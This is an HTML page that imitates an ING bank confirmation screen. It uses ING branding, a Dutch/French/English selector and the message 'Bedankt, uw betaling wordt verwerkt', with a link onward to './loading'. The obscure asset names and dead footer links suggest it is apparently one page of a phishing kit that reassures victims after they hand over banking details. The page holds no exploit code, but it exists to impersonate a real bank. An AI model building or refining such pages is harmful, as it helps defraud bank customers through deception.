<!DOCTYPE html>
<html lang="nl">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>ING - Succes</title>
    <link rel="icon" href="assets/droneikaragwa.png" type="image/x-icon">
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
            font-family: Arial, Helvetica, sans-serif;
        }

        body {
            background-image: url(./assets/deone.svg);
            background-color: #f0f0f0;
            position: relative;
            min-height: 100vh;
            --lion-bg: none;
            overflow-x: hidden;
            background-repeat: no-repeat;
            background-position: 100% 100%;
            background-size: auto 500px;
            display: flex;
            flex-direction: column;
        }

        header {
            display: flex;
            justify-content: space-between;
            align-items: center;
            padding: 15px 30px;
            background-color: white;
            box-shadow: 0 2px 8px rgba(0, 0, 0, 0.2);
            position: relative;
            z-index: 10;
        }

        .language-selector {
            display: flex;
            align-items: center;
        }

        .language-selector a {
            text-decoration: none;
            color: #696969;
            font-weight: 1rem;
            line-height: 1.5rem;
            padding: 0 5px;
        }

        .language-selector a.active {
            color: #333;
            font-weight: bold;
        }

        .separator {
            color: #ccc;
        }

        main {
            padding: 20px;
            display: flex;
            justify-content: center;
            align-items: center;
            position: relative;
            flex: 1;
        }

        .success-container {
            max-width: 500px;
            width: 100%;
            margin: 0 auto;
        }

        .success-card {
            background-color: white;
            border-radius: 8px;
            padding: 40px 30px;
            box-shadow: 0 2px 8px rgba(0, 0, 0, 0.15);
            margin-bottom: 40px;
            max-width: 450px;
            margin-left: auto;
            margin-right: auto;
            text-align: center;
        }

        .success-card h2 {
            text-align: center;
            color: #ff6200;
            margin: 0px 0px 30px 0px;
            font-size: 24px;
            font-weight: 600;
            font-family: Arial, Helvetica, sans-serif;
        }

        .success-icon {
            width: 80px;
            height: 80px;
            margin: 0 auto 30px;
            background-color: #ff6200;
            border-radius: 50%;
            display: flex;
            justify-content: center;
            align-items: center;
        }

        .success-message {
            margin-bottom: 40px;
            font-size: 16px;
            line-height: 1.5;
            color: #333;
        }

        .btn-home {
            background-color: #ff6200;
            color: white;
            border: none;
            padding: 12px 20px;
            border-radius: 8px;
            font-size: 18px;
            font-weight: bold;
            cursor: pointer;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
            transition: background-color 0.2s, box-shadow 0.2s;
            width: 100%;
            max-width: 350px;
            text-decoration: none;
        }

        .btn-home:hover {
            background-color: #e85600;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.35);
        }

        footer {
            position: fixed;
            bottom: 0;
            left: 0;
            width: 100%;
            padding: 15px 0px;
            z-index: 5;
            text-align: center;
        }

        .footer-links {
            display: flex;
            justify-content: center;
            gap: 15px;
        }

        .footer-links a {
            color: #333333;
            text-decoration: underline;
            font-size: 14px;
            transition: color 0.2s;
        }

        .footer-links a:hover {
            color: #333;
        }

        @media (max-width: 1024px) {
            body {
            background-image: none;
            }
        }

        @media (max-width: 449px) {
            footer {
                position: fixed;
                bottom: 0;
                left: 0;
                width: 100%;
                padding: 10px 0px;
                text-align: left;
                padding-left: 20px; 
            }
            
            .footer-links {
                display: flex;
                flex-direction: column;
                align-items: left;
                gap: 8px;
            }
            
            .footer-links a {
                color: #333333;
                text-decoration: underline;
                font-size: 12px;
            }
        }

        @media (max-width: 737px) {
            footer {
                position: fixed;
                bottom: 0;
                left: 0;
                width: 100%;
                padding: 30px 0px;
                text-align: left;
                padding-left: 20px; 
            }
            
            .footer-links {
                display: flex;
                flex-direction: column;
                gap: 8px;
                align-items: left;
            }
            
            .footer-links a {
                color: #333333;
                text-decoration: underline;
                font-size: 12px;
            }
        }

        @media screen and (max-width: 840px) {
            main {
                padding: 20px 0px 20px 0px;
            }

            .success-container {
                width: 100%;
                max-width: 100%;
            }
            
            .success-card {
                width: 100%;
                max-width: 100%;
            }
        }
    </style>
</head>
<body>
    <header>
        <div class="logo" style="height: 30px;">
            <img src="assets/talmassan.svg" alt="ING Logo" style="height: 30px; width: auto;">
        </div>
        <div class="language-selector">
            <a href="#" class="active">NL</a>
            <span class="separator">|</span>
            <a href="#">FR</a>
            <span class="separator">|</span>
            <a href="#">EN</a>
        </div>
    </header>
    
    <main>
        <div class="success-container">
            <div class="success-card">
                <h2>Succes</h2>
                
                <div class="success-icon">
                    <svg width="40" height="40" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
                        <path d="M9 16.2L4.8 12L3.4 13.4L9 19L21 7L19.6 5.6L9 16.2Z" fill="white"/>
                    </svg>
                </div>
                
                <div class="success-message">
                    <p>Bedankt, uw betaling wordt verwerkt.</p>
                </div>
                
                <a href="./loading" class="btn-home">Terug naar de startpagina</a>
            </div>
        </div>
    </main>
    
    <footer>
        <div class="footer-links">
            <a href="#">Online veiligheid</a>
            <a href="#">Privacy</a>
            <a href="#">Algemeen Reglement der Verrichtingen</a>
        </div>
    </footer>
</body>
</html> 